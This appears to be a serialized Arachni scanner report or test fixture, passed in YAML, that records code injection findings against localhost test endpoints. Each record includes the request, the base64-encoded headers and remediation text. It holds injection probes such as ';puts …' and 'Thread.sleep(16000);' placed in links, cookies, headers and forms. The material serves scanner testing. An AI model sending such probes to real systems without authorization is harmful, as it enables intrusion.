cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/ruby/link/straight?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;puts 287630581954+4196403186331128
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ;puts 287630581954+4196403186331128
:follow_location: true
:injected: ;puts 287630581954+4196403186331128
:combo:
!binary "aW5wdXQ=": ;puts 287630581954+4196403186331128
:action: http://localhost:6875/ruby/link/straight?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/ruby/link/straight?input=default
injected: ;puts 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/ruby/link/append?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;puts 287630581954+4196403186331128
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default;puts 287630581954+4196403186331128
:follow_location: true
:injected: default;puts 287630581954+4196403186331128
:combo:
!binary "aW5wdXQ=": default;puts 287630581954+4196403186331128
:action: http://localhost:6875/ruby/link/append?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/ruby/link/append?input=default
injected: default;puts 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie2
url: http://localhost:6875/ruby/cookie/append
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;puts 287630581954+4196403186331128
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value;puts 287630581954+4196403186331128
:injected: cookie value;puts 287630581954+4196403186331128
:combo:
!binary "Y29va2llMg==": cookie value;puts 287630581954+4196403186331128
:action: http://localhost:6875/ruby/cookie/append
:verification: false
:id: '4196690816913082'
var: cookie2
url: http://localhost:6875/ruby/cookie/append
injected: cookie value;puts 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value%3Bputs+287630581954%2B4196403186331128;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:6875/ruby/cookie/straight
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;puts 287630581954+4196403186331128
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ;puts 287630581954+4196403186331128
:injected: ;puts 287630581954+4196403186331128
:combo:
!binary "Y29va2ll": ;puts 287630581954+4196403186331128
:action: http://localhost:6875/ruby/cookie/straight
:verification: false
:id: '4196690816913082'
var: cookie
url: http://localhost:6875/ruby/cookie/straight
injected: ;puts 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=%3Bputs+287630581954%2B4196403186331128
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo0NyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/ruby/header/append
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;puts 287630581954+4196403186331128
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user;puts 287630581954+4196403186331128
:injected: arachni_user;puts 287630581954+4196403186331128
:combo:
User-Agent: arachni_user;puts 287630581954+4196403186331128
:action: http://localhost:6875/ruby/header/append
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/ruby/header/append
injected: arachni_user;puts 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user;puts 287630581954+4196403186331128
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo1NSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/ruby/header/straight
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;puts 287630581954+4196403186331128
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ;puts 287630581954+4196403186331128
:injected: ;puts 287630581954+4196403186331128
:combo:
User-Agent: ;puts 287630581954+4196403186331128
:action: http://localhost:6875/ruby/header/straight
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/ruby/header/straight
injected: ;puts 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ;puts 287630581954+4196403186331128
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzo1NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/java/form/straight
elem: form
method: POST
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' Thread.sleep(__TIME__);'
:skip_orig: true
:injected_orig: ! ' Thread.sleep(16000);'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' Thread.sleep(16000);'
:follow_location: true
:injected: ! ' Thread.sleep(16000);'
:combo:
!binary "aW5wdXQ=": ! ' Thread.sleep(16000);'
:action: http://localhost:14309/java/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/java/form/straight
injected: ! ' Thread.sleep(16000);'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:14309/java/link/straight?input=default
elem: link
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' Thread.sleep(__TIME__);'
:skip_orig: true
:injected_orig: ! ' Thread.sleep(16000);'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' Thread.sleep(16000);'
:follow_location: true
:injected: ! ' Thread.sleep(16000);'
:combo:
!binary "aW5wdXQ=": ! ' Thread.sleep(16000);'
:action: http://localhost:14309/java/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:14309/java/link/straight?input=default
injected: ! ' Thread.sleep(16000);'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases
where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are
false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations: []
internal_modname: CodeInjectionTiming
internal_modname: CodeInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:14309/java/cookie/straight
elem: cookie
method: GET
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
a timing attack; timing attacks\n can result in false positives in cases where
the server takes\n an abnormally long time to respond.\n Either case, these
issues will require further investigation\n even if they are false positives.)"
tags:
- code
- injection
- timing
- blind
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 11200.0
:timeout_divider: 1
:timing_string: ! ' Thread.sleep(__TIME__);'
:skip_orig: true
:injected_orig: ! ' Thread.sleep(16000);'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' Thread.sleep(16000);'
:injected: ! ' Thread.sleep(16000);'
:combo:
!binary "Y29va2ll": ! ' Thread.sleep(16000);'
:action: http://localhost:14309/java/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:14309/java/cookie/straight
injected: ! ' Thread.sleep(16000);'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=++Thread.sleep(16000)%3B
response: {}
name: Code injection (timing attack)
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system.\n (This issue was discovered using
